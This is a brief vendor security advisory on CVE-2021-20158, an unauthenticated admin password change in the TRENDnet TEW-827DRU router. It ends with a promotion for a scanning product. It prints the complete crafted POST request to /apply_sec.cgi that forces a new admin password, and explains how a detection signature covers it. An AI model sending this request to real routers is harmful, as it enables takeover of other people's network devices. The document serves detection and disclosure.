Trendnet AC2600 TEW-827DRU Unauthenticated Admin Password Change



Application Details

TRENDnet’s AC2600 MU-MIMO WiFi Router, model TEW-827DRU, is built to perform in a busy connected home. This dual-band router generates two quad-stream WiFi networks—a 1,733Mbps WiFi AC and a concurrent 800Mbps WiFi N network.


Vulnerability

TRENDnet AC2600 TEW-827DRU routers could allow a remote attacker to bypass security restrictions, caused by the containment of a hidden administrative command.


Identification

By sending a specially crafted request, an attacker could exploit this vulnerability to force the change of the admin password.


POST /apply_sec.cgi

ccp_act=set&action=tools_admin_elecom&html_response_page=dummy_value&html_response_return_page=dummy_value&method=tools&admin_password=testing123

Detection

By turning this into a traffic file and matching rule, we are able to detect unauthenticated attempts to force the change of the admin password.


Coverage

Idappcom has created signature 8022354 along with a corresponding traffic file.


References

CVE-2021-20158

NIST NVD (CVE-2021-20158)


Traffic IQ

If you are concerned that your business may be at risk of this vulnerability or others why not try out our Traffic IQ software which can scan your defences and report any issues. Learn more here: https://www.idappcom.co.uk/traffic-iq-professional